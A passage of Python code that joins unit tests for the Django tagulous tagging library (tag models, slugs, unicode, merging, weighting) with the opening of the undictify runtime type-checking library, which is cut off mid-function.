t1a = self.tag_model.objects.create(name="one")
t1b = self.tag_model.objects.get(name="one")
self.assertEqual(t1a, t1b)
def test_tags_equal_string(self):
"Test TagModel.__eq__ with instance and string"
t1 = self.tag_model.objects.create(name="one")
self.assertEqual(t1, "one")
def test_tags_not_equal_instance(self):
"Test TagModel.__ne__ with instances"
t1 = self.tag_model.objects.create(name="one")
t2 = self.tag_model.objects.create(name="two")
self.assertNotEqual(t1, t2)
def test_tags_not_equal_string(self):
"Test TagModel.__eq__ with instance and string"
t1 = self.tag_model.objects.create(name="one")
self.assertNotEqual(t1, "two")
def test_get_absolute_url_defined(self):
"Test get_absolute_url when passed in field definition"
t1 = self.tag_model.objects.create(name="one")
self.assertEqual(t1.get_absolute_url(), "url for one")
def test_get_absolute_url_not_defined(self):
"Test get_absolute_url when passed in field definition"
t1 = test_models.SimpleMixedTest.tags.tag_model.objects.create(name="one")
with self.assertRaises(AttributeError) as cm:
t1.get_absolute_url()
self.assertEqual(
str(cm.exception),
"'Tagulous_SimpleMixedTest_tags' has no attribute 'get_absolute_url'",
)
def test_name_field_length(self):
"""
Value is initialized in setup.py runtests() settings
"""
self.assertEqual(
self.tag_model._meta.get_field("name").max_length,
tagulous_settings.NAME_MAX_LENGTH,
)
def test_slug_field_length(self):
"""
Value is initialized in setup.py runtests() settings
"""
self.assertEqual(
self.tag_model._meta.get_field("slug").max_length,
tagulous_settings.SLUG_MAX_LENGTH,
)
def test_empty_name_raises_integrity_error(self):
with self.assertRaises(IntegrityError) as cm:
self.tag_model.objects.create(name=None)
err = str(cm.exception).lower()
self.assertTrue("name" in err)
self.assertTrue("null" in err)
def assertRelatedExists(self, related_fields, match_model, field_name):
"""
Look through the related fields and find the field which refers to the
specified model; fail if it does not exist
"""
match_field = match_model._meta.get_field(field_name)
for related in related_fields:
if related.related_model == match_model and related.field == match_field:
return related
self.fail("Expected related field not found")
def test_get_related_fields(self):
"Check the class method returns a list of related fields"
related_fields = self.tag_model.get_related_fields()
self.assertEqual(len(related_fields), 4)
# FK comes before M2M, so first two will be the SingleTagFields
self.assertRelatedExists(related_fields, self.model1, "singletag")
self.assertRelatedExists(related_fields, self.model2, "singletag")
# Now the TagFields
self.assertRelatedExists(related_fields, self.model1, "tags")
self.assertRelatedExists(related_fields, self.model2, "tags")
def test_get_related_fields_standard(self):
"Check the class method can also find standard relationships"
related_fields = self.tag_model.get_related_fields(include_standard=True)
self.assertEqual(len(related_fields), 6)
# SingleTagFields/FKs
self.assertRelatedExists(related_fields, self.model1, "singletag")
self.assertRelatedExists(related_fields, self.model2, "singletag")
self.assertRelatedExists(related_fields, self.model_nontag, "fk")
# TagFields/M2Ms
self.assertRelatedExists(related_fields, self.model1, "tags")
self.assertRelatedExists(related_fields, self.model2, "tags")
self.assertRelatedExists(related_fields, self.model_nontag, "mm")
def test_get_related_objects(self):
"""
Check the class method returns a list of related models, fields and
instances
"""
t1 = self.create(self.model1, name="Test 1", singletag="Mr", tags="blue")
t2 = self.create(self.model1, name="Test 2", singletag="Mr", tags="green")
t3 = self.create(self.model2, name="Test 3", singletag="Mrs", tags="green")
t4 = self.create(self.model2, name="Test 4", singletag="Mr", tags="green")
#
# Check Mr
#
singletag1 = self.tag_model.objects.get(name="Mr")
rel_st1 = singletag1.get_related_objects()
self.assertEqual(len(rel_st1), 2)
# Don't assume order - we could probably guess reliably, but
# why risk it in tests
# rel_st1 is list of [model, field, [instances]]
if rel_st1[0][0] == self.model1:
rel_st1_m1 = rel_st1[0]
rel_st1_m2 = rel_st1[1]
else:
rel_st1_m1 = rel_st1[1]
rel_st1_m2 = rel_st1[0]
self.assertEqual(rel_st1_m1[0], self.model1)
self.assertEqual(rel_st1_m1[1], self.model1._meta.get_field("singletag"))
self.assertEqual(len(rel_st1_m1[2]), 2)
self.assertEqual(rel_st1_m1[2][0], t1)
self.assertEqual(rel_st1_m1[2][1], t2)
self.assertEqual(rel_st1_m2[0], self.model2)
self.assertEqual(rel_st1_m2[1], self.model2._meta.get_field("singletag"))
self.assertEqual(len(rel_st1_m2[2]), 1)
self.assertEqual(rel_st1_m2[2][0], t4)
#
# Check Mrs
#
singletag2 = self.tag_model.objects.get(name="Mrs")
rel_st2 = singletag2.get_related_objects()
self.assertEqual(len(rel_st2), 1)
rel_st2_m1 = rel_st2[0]
self.assertEqual(rel_st2_m1[0], self.model2)
self.assertEqual(rel_st2_m1[1], self.model2._meta.get_field("singletag"))
self.assertEqual(len(rel_st2_m1[2]), 1)
self.assertEqual(rel_st2_m1[2][0], t3)
#
# Check blue
#
tags1 = self.tag_model.objects.get(name="blue")
rel_t1 = tags1.get_related_objects()
self.assertEqual(len(rel_t1), 1)
rel_t1_m1 = rel_t1[0]
self.assertEqual(rel_t1_m1[0], self.model1)
self.assertEqual(rel_t1_m1[1], self.model1._meta.get_field("tags"))
self.assertEqual(len(rel_t1_m1[2]), 1)
self.assertEqual(rel_t1_m1[2][0], t1)
#
# Check green
#
tags2 = self.tag_model.objects.get(name="green")
rel_t2 = tags2.get_related_objects()
self.assertEqual(len(rel_t2), 2)
if rel_t2[0][0] == self.model1:
rel_t2_m1 = rel_t2[0]
rel_t2_m2 = rel_t2[1]
else:
rel_t2_m1 = rel_t2[1]
rel_t2_m2 = rel_t2[0]
self.assertEqual(rel_t2_m1[0], self.model1)
self.assertEqual(rel_t2_m1[1], self.model1._meta.get_field("tags"))
self.assertEqual(len(rel_t2_m1[2]), 1)
self.assertEqual(rel_t2_m1[2][0], t2)
self.assertEqual(rel_t2_m2[0], self.model2)
self.assertEqual(rel_t2_m2[1], self.model2._meta.get_field("tags"))
self.assertEqual(len(rel_t2_m2[2]), 2)
self.assertEqual(rel_t2_m2[2][0], t3)
self.assertEqual(rel_t2_m2[2][1], t4)
def test_get_related_objects_flat(self):
"Check the class method returns a flat list of related instances"
t1 = self.create(self.model1, name="Test 1", singletag="Mr", tags="blue")
t2 = self.create(self.model1, name="Test 2", singletag="Mr", tags="green")
t3 = self.create(self.model2, name="Test 3", singletag="Mrs", tags="green")
t4 = self.create(self.model2, name="Test 4", singletag="Mr", tags="green")
# Check Mr
singletag1 = self.tag_model.objects.get(name="Mr")
rel_st1 = singletag1.get_related_objects(flat=True)
self.assertEqual(len(rel_st1), 3)
rel_st1.sort(key=lambda tag: tag.name)
self.assertEqual(rel_st1[0], t1)
self.assertEqual(rel_st1[1], t2)
self.assertEqual(rel_st1[2], t4)
# Check Mrs
singletag2 = self.tag_model.objects.get(name="Mrs")
rel_st2 = singletag2.get_related_objects(flat=True)
self.assertEqual(len(rel_st2), 1)
self.assertEqual(rel_st2[0], t3)
# Check blue
tags1 = self.tag_model.objects.get(name="blue")
rel_t1 = tags1.get_related_objects(flat=True)
self.assertEqual(len(rel_t1), 1)
self.assertEqual(rel_t1[0], t1)
# Check green
tags2 = self.tag_model.objects.get(name="green")
rel_t2 = tags2.get_related_objects(flat=True)
self.assertEqual(len(rel_t2), 3)
rel_t2.sort(key=lambda tag: tag.name)
self.assertEqual(rel_t2[0], t2)
self.assertEqual(rel_t2[1], t3)
self.assertEqual(rel_t2[2], t4)
def test_get_related_objects_flat_distinct(self):
"Check the class method returns a flat list of distinct related instances"
t1 = self.create(self.model1, name="<NAME>", singletag="Mr", tags="blue")
t2 = self.create(self.model2, name="<NAME>", singletag="blue", tags="blue")
# Check blue non-distinct
tags1 = self.tag_model.objects.get(name="blue")
rel_t1 = tags1.get_related_objects(flat=True)
self.assertEqual(len(rel_t1), 3)
rel_t1.sort(key=lambda tag: tag.name)
self.assertEqual(rel_t1[0], t1)
self.assertEqual(rel_t1[1], t2)
self.assertEqual(rel_t1[2], t2)
# Check blue distinct
rel_t2 = tags1.get_related_objects(flat=True, distinct=True)
self.assertEqual(len(rel_t2), 2)
rel_t2.sort(key=lambda tag: tag.name)
self.assertEqual(rel_t2[0], t1)
self.assertEqual(rel_t2[1], t2)
def test_get_related_objects_flat_include_standard(self):
"""
Check the class method returns a flat list of related instances,
including standard relationships
No need to test other options with include_standard, uses same code
"""
t1 = self.create(self.model1, name="<NAME>", singletag="Mr", tags="blue")
singletag1 = self.tag_model.objects.get(name="Mr")
tags1 = self.tag_model.objects.get(name="blue")
t2 = self.create(self.model_nontag, name="Test 2", fk=singletag1, mm=[tags1])
# Check Mr
rel_st1 = singletag1.get_related_objects(flat=True, include_standard=True)
self.assertEqual(len(rel_st1), 2)
rel_st1.sort(key=lambda tag: tag.name)
self.assertEqual(rel_st1[0], t1)
self.assertEqual(rel_st1[1], t2)
# Check blue
rel_t1 = tags1.get_related_objects(flat=True, include_standard=True)
self.assertEqual(len(rel_t1), 2)
rel_t1.sort(key=lambda tag: tag.name)
self.assertEqual(rel_t1[0], t1)
self.assertEqual(rel_t1[1], t2)
def test_increment(self):
"Increment the tag count"
tag1 = self.create(self.tag_model, name="blue")
self.assertInstanceEqual(tag1, count=0)
tag1.increment()
self.assertInstanceEqual(tag1, count=1)
def test_increment_db(self):
"Increment the tag count using the DB value, not in-memory"
tag1 = self.create(self.tag_model, name="blue")
tag2 = self.tag_model.objects.get(pk=tag1.pk)
self.assertEqual(tag1.count, 0)
self.assertEqual(tag2.count, 0)
tag1.increment()
self.assertInstanceEqual(tag1, count=1)
self.assertInstanceEqual(tag2, count=1)
self.assertEqual(tag1.count, 1)
self.assertEqual(tag2.count, 0)
tag2.increment()
self.assertInstanceEqual(tag1, count=2)
self.assertInstanceEqual(tag2, count=2)
self.assertEqual(tag1.count, 1)
self.assertEqual(tag2.count, 2)
def test_decrement(self):
tag1 = self.create(self.tag_model, name="blue", count=2)
self.assertTagModel(self.tag_model, {"blue": 2})
tag1.decrement()
self.assertTagModel(self.tag_model, {"blue": 1})
def test_decrement_delete(self):
tag1 = self.create(self.tag_model, name="blue", count=1)
self.assertTagModel(self.tag_model, {"blue": 1})
tag1.decrement()
self.assertTagModel(self.tag_model, {})
def test_decrement_delete_protected(self):
tag1 = self.create(self.tag_model, name="blue", count=1, protected=True)
self.assertTagModel(self.tag_model, {"blue": 1})
tag1.decrement()
self.assertTagModel(self.tag_model, {"blue": 0})
def test_decrement_delete_hasrefs(self):
"""
Check that when a tag's count hits 0, but still has non-tag field
references, that it isn't deleted - don't want to cascade/break refs
"""
# Create tags with false count
tag1 = self.create(self.tag_model, name="blue", count=1)
tag2 = self.create(self.tag_model, name="red", count=1)
self.assertTagModel(self.tag_model, {"blue": 1, "red": 1})
# Create object with conventional references to tags
t1 = self.create(self.model_nontag, name="CharField", fk=tag1, mm=[tag2])
self.assertInstanceEqual(t1, name="CharField", fk=tag1, mm=[tag2])
# No change to count
self.assertTagModel(self.tag_model, {"blue": 1, "red": 1})
# Check get_related_objects knows about them
self.assertEqual(
len(tag1.get_related_objects(flat=True, include_standard=True)), 1
)
self.assertEqual(
len(tag2.get_related_objects(flat=True, include_standard=True)), 1
)
# Now decrement counts to 0, but tags remain
tag1.decrement()
tag2.decrement()
self.assertTagModel(self.tag_model, {"blue": 0, "red": 0})
def test_update_count(self):
"Purposely knock the count off and update it"
t1 = self.create(self.model1, name="Test 1", tags="blue")
tag1 = self.tag_model.objects.get(name="blue")
self.assertTagModel(self.tag_model, {"blue": 1})
tag1.count = 3
tag1.save()
self.assertTagModel(self.tag_model, {"blue": 3})
tag1.update_count()
self.assertTagModel(self.tag_model, {"blue": 1})
t1.delete()
self.assertTagModel(self.tag_model, {})
def test_slug_set(self):
"Check the slug field is set correctly"
t1a = self.tag_model.objects.create(name="One and Two!")
self.assertEqual(t1a.slug, "one-and-two")
def test_slug_saved(self):
"Check the slug field is saved correctly"
t1a = self.tag_model.objects.create(name="One and Two!")
t1b = self.tag_model.objects.get(name="One and Two!")
self.assertEqual(t1a.slug, t1b.slug)
self.assertEqual(t1b.slug, "one-and-two")
def test_slug_clash(self):
"Check slug field avoids clashes to remain unique"
t1a = self.tag_model.objects.create(name="one and two")
t2a = self.tag_model.objects.create(name="One and Two!")
t3a = self.tag_model.objects.create(name="One and Two?")
t4a = self.tag_model.objects.create(name="One and Two.")
self.assertEqual(t1a.slug, "one-and-two")
self.assertEqual(t2a.slug, "one-and-two_1")
self.assertEqual(t3a.slug, "one-and-two_2")
self.assertEqual(t4a.slug, "one-and-two_3")
t1b = self.tag_model.objects.get(name="one and two")
t2b = self.tag_model.objects.get(name="One and Two!")
t3b = self.tag_model.objects.get(name="One and Two?")
t4b = self.tag_model.objects.get(name="One and Two.")
self.assertEqual(t1b.slug, "one-and-two")
self.assertEqual(t2b.slug, "one-and-two_1")
self.assertEqual(t3b.slug, "one-and-two_2")
self.assertEqual(t4b.slug, "one-and-two_3")
def test_tag_model_factory(self):
"Check the tag model factory supports setting max lengths"
TestModel = test_models.TagSlugShorterModel
self.assertEqual(TestModel._meta.get_field("name").max_length, 20)
self.assertEqual(TestModel._meta.get_field("slug").max_length, 10)
def test_long_slug_truncates(self):
"Check the slug field is truncated correctly"
TestModel = test_models.TagSlugShorterModel
name_length = TestModel._meta.get_field("name").max_length
slug_length = TestModel._meta.get_field("slug").max_length
self.assertLess(slug_length, name_length)
t1a = TestModel.objects.create(name="x" * name_length)
self.assertEqual(t1a.name, "x" * name_length)
self.assertEqual(t1a.slug, "x" * slug_length)
def test_long_slug_clash_truncates(self):
"Check clashing slug fields are truncated correctly"
TestModel = test_models.TagSlugShorterModel
name_length = TestModel._meta.get_field("name").max_length
slug_length = TestModel._meta.get_field("slug").max_length
self.assertLess(slug_length, name_length)
ln1 = "{}{}".format("x" * (name_length - 1), "1")
ln2 = "{}{}".format("x" * (name_length - 1), "2")
t1a = TestModel.objects.create(name=ln1)
t2a = TestModel.objects.create(name=ln2)
self.assertEqual(t1a.name, ln1)
self.assertEqual(t1a.slug, "x" * slug_length)
self.assertEqual(t2a.name, ln2)
slug2 = "{}_{}".format("x" * (slug_length - SLUG_TRUNCATE_UNIQUE), "1")
self.assertEqual(t2a.slug, slug2)
# ##############################################################################
# ###### Test TagMeta in tag model
# ##############################################################################
class TagMetaTest(TagTestManager, TestCase):
"""
Test TagMeta class. Builds on tests in tests_options.
"""
def test_sets_options(self):
"Check TagMeta sets the options"
opt = test_models.TagMetaAbstractModel.tag_options
# Check local options
cls_opt = opt.items(with_defaults=False)
self.assertEqual(cls_opt["initial"], ["Adam", "Brian", "Chris"])
self.assertEqual(cls_opt["force_lowercase"], True)
self.assertEqual(cls_opt["max_count"], 5)
self.assertTrue("case_sensitive" not in cls_opt)
# Check default options
self.assertEqual(opt.case_sensitive, False)
def test_inheritance(self):
"Check TagMeta can be inherited and overridden"
opt_abstract = test_models.TagMetaAbstractModel.tag_options
opt = test_models.TagMetaModel.tag_options
# Check they're not shared instances
self.assertNotEqual(id(opt_abstract), id(opt))
self.assertNotEqual(id(opt), id(tag_models.models.BaseTagModel.tag_options))
# Check local options
cls_opt = opt.items(with_defaults=False)
self.assertEqual(cls_opt["case_sensitive"], True)
self.assertEqual(cls_opt["max_count"], 10)
# Local options will also include inherited options
self.assertEqual(opt.initial, ["Adam", "Brian", "Chris"])
self.assertEqual(opt.force_lowercase, True)
self.assertEqual(opt.max_count, 10)
self.assertEqual(opt.case_sensitive, True)
# ##############################################################################
# ###### Test unicode in tag model
# ##############################################################################
class TagModelUnicodeTest(TagTestManager, TestCase):
"""
Test unicode tags - with unicode slugs disabled, and forced to not use unidecode,
even if available
"""
manage_models = [test_models.MixedTest]
def setUpExtra(self):
# Disable unidecode support
self.unidecode_status = tag_utils.unidecode
tag_utils.unidecode = None
self.model = test_models.MixedTest
self.tag_model = test_models.MixedTestTagModel
self.o1 = self.create(
self.model, name="Test", singletag="男の子", tags="boy, niño, 男の子"
)
def tearDownExtra(self):
tag_utils.unidecode = self.unidecode_status
def test_setup(self):
"Check setup created tags as expected"
self.assertTagModel(self.tag_model, {"boy": 1, "niño": 1, "男の子": 2})
# Check lookup
def test_get_singletag_get(self):
"Check unicode singletag name matches"
t1 = self.model.objects.get(singletag="男の子")
self.assertEqual(t1.pk, self.o1.pk)
def test_get_tag_ascii(self):
"Check unicode tag name matches when ascii"
t1 = self.model.objects.get(tags="boy")
self.assertEqual(t1.pk, self.o1.pk)
def test_get_tag_extended_ascii(self):
"Check unicode tag name matches when extended ascii"
t1 = self.model.objects.get(tags="niño")
self.assertEqual(t1.pk, self.o1.pk)
def test_get_tag_japanese(self):
"Check unicode tag name matches when above extended ascii"
t1 = self.model.objects.get(tags="男の子")
self.assertEqual(t1.pk, self.o1.pk)
# Check render
def test_singletag_render(self):
"Check unicode singletag name renders"
t1 = self.model.objects.get(name="Test")
self.assertEqual(str(t1.singletag), "男の子")
def test_tag_render(self):
"Check unicode tag name renders"
t1 = self.model.objects.get(name="Test")
tags = list(t1.tags.all())
self.assertEqual(str(tags[0]), "boy")
self.assertEqual(str(tags[1]), "niño")
self.assertEqual(str(tags[2]), "男の子")
def test_tag_string_render(self):
"Check unicode tags string renders"
t1 = self.model.objects.get(name="Test")
self.assertEqual(str(t1.tags), "boy, niño, 男の子")
# Check slugs
def test_slug_ascii(self):
"Check ascii tag name slugified to ascii"
t1 = self.tag_model.objects.get(name="boy")
self.assertEqual(t1.slug, "boy")
def test_slug_extended_ascii(self):
"Check extended ascii tag name slugified to ascii"
t1 = self.tag_model.objects.get(name="niño")
self.assertEqual(t1.slug, "nino")
def test_slug_japanese(self):
"Check unicode tag name slugified to ascii"
name = "男の子"
t1 = self.tag_model.objects.get(name=name)
self.assertEqual(t1.name, name)
self.assertEqual(t1.slug, "_")
try:
from unidecode import unidecode
except ImportError:
unidecode = None
class TagModelFullUnicodeTest(TagTestManager, TestCase):
"""
Test unicode tags, with unicode enabled
This only affects slugs
"""
manage_models = [test_models.MixedTest]
def setUpExtra(self):
# Disable unicode support
self.unicode_status = tagulous_settings.SLUG_ALLOW_UNICODE
tagulous_settings.SLUG_ALLOW_UNICODE = True
self.model = test_models.MixedTest
self.tag_model = test_models.MixedTestTagModel
self.o1 = self.create(
self.model, name="Test", singletag="男の子", tags="boy, niño, 男の子"
)
def tearDownExtra(self):
tagulous_settings.SLUG_ALLOW_UNICODE = self.unicode_status
def test_setup(self):
"Check setup created tags as expected"
self.assertTagModel(self.tag_model, {"boy": 1, "niño": 1, "男の子": 2})
def test_slug_ascii(self):
"Check ascii tag name slugified to ascii"
t1 = self.tag_model.objects.get(name="boy")
self.assertEqual(t1.slug, "boy")
def test_slug_extended_ascii(self):
"Check extended ascii tag name slugified to ascii"
t1 = self.tag_model.objects.get(name="niño")
self.assertEqual(t1.slug, "niño")
def test_slug_japanese(self):
"Check unicode tag name slugified to ascii"
name = "男の子"
t1 = self.tag_model.objects.get(name=name)
self.assertEqual(t1.slug, name)
# ##############################################################################
# ###### Test tag merging
# ##############################################################################
class TagModelMergeTest(TagTestManager, TestCase):
"""
Test tag merging
"""
manage_models = [test_models.MixedTest, test_models.MixedRefTest]
def test_merge_tags(self):
tag_model = test_models.MixedTestTagModel
# Set up database
a1 = self.create(test_models.MixedTest, name="a1", singletag="one", tags="one")
a2 = self.create(test_models.MixedTest, name="a2", singletag="two", tags="two")
a3 = self.create(
test_models.MixedTest, name="a3", singletag="three", tags="three"
)
b1 = self.create(
test_models.MixedRefTest, name="b1", singletag="one", tags="one"
)
b2 = self.create(
test_models.MixedRefTest, name="b2", singletag="two", tags="two"
)
b3 = self.create(
test_models.MixedRefTest, name="b3", singletag="three", tags="three"
)
# Confirm it's correct
self.assertTagModel(tag_model, {"one": 4, "two": 4, "three": 4})
self.assertInstanceEqual(a1, singletag="one", tags="one")
self.assertInstanceEqual(a2, singletag="two", tags="two")
self.assertInstanceEqual(a3, singletag="three", tags="three")
self.assertInstanceEqual(b1, singletag="one", tags="one")
self.assertInstanceEqual(b2, singletag="two", tags="two")
self.assertInstanceEqual(b3, singletag="three", tags="three")
# Merge tags
s1 = tag_model.objects.get(name="one")
s1.merge_tags(tag_model.objects.filter(name__in=["one", "two", "three"]))
# Check it's correct
self.assertTagModel(tag_model, {"one": 12})
self.assertInstanceEqual(a1, singletag="one", tags="one")
self.assertInstanceEqual(a2, singletag="one", tags="one")
self.assertInstanceEqual(a3, singletag="one", tags="one")
self.assertInstanceEqual(b1, singletag="one", tags="one")
self.assertInstanceEqual(b2, singletag="one", tags="one")
self.assertInstanceEqual(b3, singletag="one", tags="one")
def test_merge_multiple_tags(self):
"Test merging a queryset of multiple tags"
tag_model = test_models.MixedTestTagModel
# Set up database
t1 = self.create(test_models.MixedTest, name="Test 1", tags="blue, green, red")
t2 = self.create(test_models.MixedTest, name="Test 2", tags="blue, green, red")
# Confirm it's correct
self.assertTagModel(tag_model, {"blue": 2, "green": 2, "red": 2})
self.assertInstanceEqual(t1, tags="blue, green, red")
self.assertInstanceEqual(t2, tags="blue, green, red")
# Merge tags
s1 = tag_model.objects.get(name="blue")
s1.merge_tags(tag_model.objects.filter(name__in=["blue", "green", "red"]))
# Confirm it's correct
self.assertTagModel(tag_model, {"blue": 2})
self.assertInstanceEqual(t1, tags="blue")
self.assertInstanceEqual(t2, tags="blue")
def test_merge_by_name(self):
"Test merging a list of tag names, including tags which don't exist"
tag_model = test_models.MixedTestTagModel
# Set up database
t1 = self.create(test_models.MixedTest, name="Test 1", tags="blue, green, red")
t2 = self.create(test_models.MixedTest, name="Test 2", tags="blue, green, red")
# Confirm it's correct
self.assertTagModel(tag_model, {"blue": 2, "green": 2, "red": 2})
self.assertInstanceEqual(t1, tags="blue, green, red")
self.assertInstanceEqual(t2, tags="blue, green, red")
# Merge tags
s1 = tag_model.objects.get(name="blue")
s1.merge_tags(["blue", "green", "red", "pink"])
# Confirm it's correct
self.assertTagModel(tag_model, {"blue": 2})
self.assertInstanceEqual(t1, tags="blue")
self.assertInstanceEqual(t2, tags="blue")
def test_merge_by_obj_list(self):
"Test merging a list of tag objects"
tag_model = test_models.MixedTestTagModel
t1 = self.create(test_models.MixedTest, name="Test 1", tags="blue, green, red")
t2 = self.create(test_models.MixedTest, name="Test 2", tags="blue, green, red")
# Merge tags
s1 = tag_model.objects.get(name="blue")
s1.merge_tags(list(tag_model.objects.all()))
# Confirm it's correct
self.assertTagModel(tag_model, {"blue": 2})
self.assertInstanceEqual(t1, tags="blue")
self.assertInstanceEqual(t2, tags="blue")
def test_merge_by_tag_string(self):
"Test merging a tag string, including tags which don't exist"
tag_model = test_models.MixedTestTagModel
t1 = self.create(test_models.MixedTest, name="Test 1", tags="blue, green, red")
t2 = self.create(test_models.MixedTest, name="Test 2", tags="blue, green, red")
# Merge tags
s1 = tag_model.objects.get(name="blue")
s1.merge_tags("blue, green, red, pink")
# Confirm it's correct
self.assertTagModel(tag_model, {"blue": 2})
self.assertInstanceEqual(t1, tags="blue")
self.assertInstanceEqual(t2, tags="blue")
# ##############################################################################
# ###### Test tag model manager and queryset
# ##############################################################################
class TagModelQuerySetTest(TagTestManager, TestCase):
"""
Test tag model queryset and manager
"""
manage_models = [test_models.TagFieldOptionsModel]
def setUpExtra(self):
self.model = test_models.TagFieldOptionsModel
self.tag_model = self.model.initial_list.tag_model
self.o1 = self.model.objects.create(name="Test 1", initial_list="<NAME>")
self.o2 = self.model.objects.create(name="Test 2", initial_list="Eric, Frank")
def test_setup(self):
self.assertTagModel(
self.model.initial_list,
{"Adam": 0, "Brian": 0, "Chris": 0, "David": 1, "Eric": 2, "Frank": 1},
)
def test_initial(self):
initial_only = self.tag_model.objects.initial()
self.assertEqual(len(initial_only), 3)
self.assertEqual(initial_only[0], "Adam")
self.assertEqual(initial_only[1], "Brian")
self.assertEqual(initial_only[2], "Chris")
def test_filter_or_initial(self):
filtered = self.tag_model.objects.filter_or_initial(
tagfieldoptionsmodel__name="Test 1"
)
self.assertEqual(len(filtered), 5)
self.assertEqual(filtered[0], "Adam")
self.assertEqual(filtered[1], "Brian")
self.assertEqual(filtered[2], "Chris")
self.assertEqual(filtered[3], "David")
self.assertEqual(filtered[4], "Eric")
def test_weight_scale_up(self):
"Test weight() scales up to max"
# Scale them to 2+2n: 0=2, 1=4, 2=6
weighted = self.tag_model.objects.weight(min=2, max=6)
self.assertEqual(len(weighted), 6)
self.assertEqual(weighted[0].name, "Adam")
self.assertEqual(weighted[0].weight, 2)
self.assertEqual(weighted[1], "Brian")
self.assertEqual(weighted[1].weight, 2)
self.assertEqual(weighted[2], "Chris")
self.assertEqual(weighted[2].weight, 2)
self.assertEqual(weighted[3], "David")
self.assertEqual(weighted[3].weight, 4)
self.assertEqual(weighted[4], "Eric")
self.assertEqual(weighted[4].weight, 6)
self.assertEqual(weighted[5], "Frank")
self.assertEqual(weighted[5].weight, 4)
def test_weight_scale_down(self):
"Test weight() scales down to max"
# Add some extras so we can scale them 0.5n+2
# Weight them so 0=2, 1=2 (rounded down), 4=4, 8=6
# Eric will be used 8 times total - 6 more
for i in range(6):
self.model.objects.create(name="Test 3.%d" % i, initial_list="Eric")
# Frank will be used 4 times total - 3 more
for i in range(3):
self.model.objects.create(name="Test 4.%d" % i, initial_list="Frank")
self.assertTagModel(
self.model.initial_list,
{"Adam": 0, "Brian": 0, "Chris": 0, "David": 1, "Eric": 8, "Frank": 4},
)
weighted = self.tag_model.objects.weight(min=2, max=6)
self.assertEqual(len(weighted), 6)
self.assertEqual(weighted[0].name, "Adam")
self.assertEqual(weighted[0].weight, 2)
self.assertEqual(weighted[1], "Brian")
self.assertEqual(weighted[1].weight, 2)
self.assertEqual(weighted[2], "Chris")
self.assertEqual(weighted[2].weight, 2)
self.assertEqual(weighted[3], "David")
self.assertEqual(weighted[3].weight, 2)
self.assertEqual(weighted[4], "Eric")
self.assertEqual(weighted[4].weight, 6)
self.assertEqual(weighted[5], "Frank")
self.assertEqual(weighted[5].weight, 4)
def test_weight_integer(self):
"Test weight() is a whole number"
weighted = self.tag_model.objects.weight(min=2.5, max=6)
self.assertEqual(weighted[0].name, "Adam")
self.assertEqual(weighted[0].weight, 2)
def test_weight_no_tags(self):
"Test weight() when there are no tags"
self.tag_model.objects.all().delete()
self.assertEqual(self.tag_model.objects.count(), 0)
weighted = self.tag_model.objects.weight()
self.assertEqual(list(weighted.values_list("weight")), [])
def test_weight_tags__no_associated(self):
"Test weight() when there are tags but none are associated"
self.tag_model.objects.all().delete()
self.assertEqual(self.tag_model.objects.count(), 0)
tag = self.tag_model.objects.create(name="test")
self.assertEqual(tag.count, 0)
weighted = self.tag_model.objects.weight()
self.assertEqual(len(weighted), 1)
self.assertEqual(weighted[0], "test")
self.assertEqual(weighted[0].weight, 1)
def test_weight_zero_no_tags(self):
"Test weight() when there are no tags and minimum weight is zero"
self.tag_model.objects.all().delete()
self.assertEqual(self.tag_model.objects.count(), 0)
weighted = self.tag_model.objects.weight(0, 6)
self.assertEqual(list(weighted.values_list("weight")), [])
def test_weight_zero_initial_tags(self):
"Test weight() when there are tags but they have no count"
self.assertEqual(self.tag_model.objects.count(), 6)
weighted = self.tag_model.objects.weight(0, 6)
self.assertEqual(
list(weighted.values_list("weight", flat=True)), [0, 0, 0, 3, 6, 3]
)
def test_to_string(self):
"Check manager and queryset can be converted to a tag string"
self.assertEqual(
str(self.tag_model.objects), "Adam, Brian, Chris, David, Eric, Frank",
)
self.assertEqual(
str(self.tag_model.objects.all()), "Adam, Brian, Chris, David, Eric, Frank",
)
self.assertEqual(str(self.tag_model.objects.initial()), "Adam, Brian, Chris")
self.assertEqual(str(self.o1.initial_list), "<NAME>")
# ##############################################################################
# ###### Test tag model with custom to_base
# ##############################################################################
class TagModelToBaseTest(TestCase):
"""
Test autogenerated tag model with to_base
"""
manage_models = [test_models.TagFieldOptionsModel]
def test_custom_base_used(self):
tag_model = test_models.CustomTagBaseTest.singletag.tag_model
self.assertTrue(issubclass(tag_model, test_models.CustomTagBase))
self.assertTrue(issubclass(tag_model, tag_models.TagModel))
self.assertTrue(tag_model.is_custom)
|
<reponame>VOlni/undictify
"""
undictify - Type-checked function calls at runtime
"""
import inspect
import sys
from functools import wraps
from typing import Any, Callable, Dict, List, Type, TypeVar, Union
VER_3_7_AND_UP = sys.version_info[:3] >= (3, 7, 0) # PEP 560
# pylint: disable=no-name-in-module
if VER_3_7_AND_UP:
from typing import _GenericAlias # type: ignore
else:
from typing import _Union # type: ignore
# pylint: enable=no-name-in-module
TypeT = TypeVar('TypeT')
def type_checked_constructor(skip: bool = False,
convert: bool = False) -> Callable[[Callable[..., TypeT]],
Callable[..., TypeT]]:
"""Replaces the constructor of the given class (in-place)
with type-checked calls."""
def call_decorator(func: Callable[..., TypeT]) -> Callable[..., TypeT]:
if not inspect.isclass(func):
raise TypeError('@_type_checked_constructor may only be used for classes.')
if _is_wrapped_func(func):
raise TypeError('Class is already wrapped by undictify.')
# Ideally we could prevent type_checked_constructor to be used
# as a normal function instead of a decorator.
# However this turns out to be very tricky,
# and given solutions break down on some corner cases.
# https://stackoverflow.com/questions/52191968/check-if-a-function-was-called-as-a-decorator
func_name = _get_log_name(func)
signature_new = inspect.signature(func.__new__)
signature_new_param_names = [param.name for param in signature_new.parameters.values()]
if signature_new_param_names != ['args', 'kwargs']:
signature_ctor = signature_new
replace_init = False
original_ctor = func.__new__
else:
original_ctor = func.__init__ # type: ignore
signature_ctor = inspect.signature(original_ctor)
replace_init = True
@wraps(original_ctor)
def wrapper(first_arg: Any, *args: Any, **kwargs: Any) -> TypeT:
kwargs_dict = _merge_args_and_kwargs(
signature_ctor, func_name, [first_arg] + list(args),
kwargs)
return _unpack_dict( # type: ignore
original_ctor,
signature_ctor,
first_arg,
kwargs_dict,
skip,
convert)
if replace_init:
func.__init__ = wrapper # type: ignore
else:
func.__new__ = wrapper # type: ignore
setattr(func, '__undictify_wrapped_func__', func)
return func
return call_decorator
def type_checked_call(skip: bool = False,
convert: bool = False) -> Callable[[Callable[..., TypeT]],
Callable[..., TypeT]]:
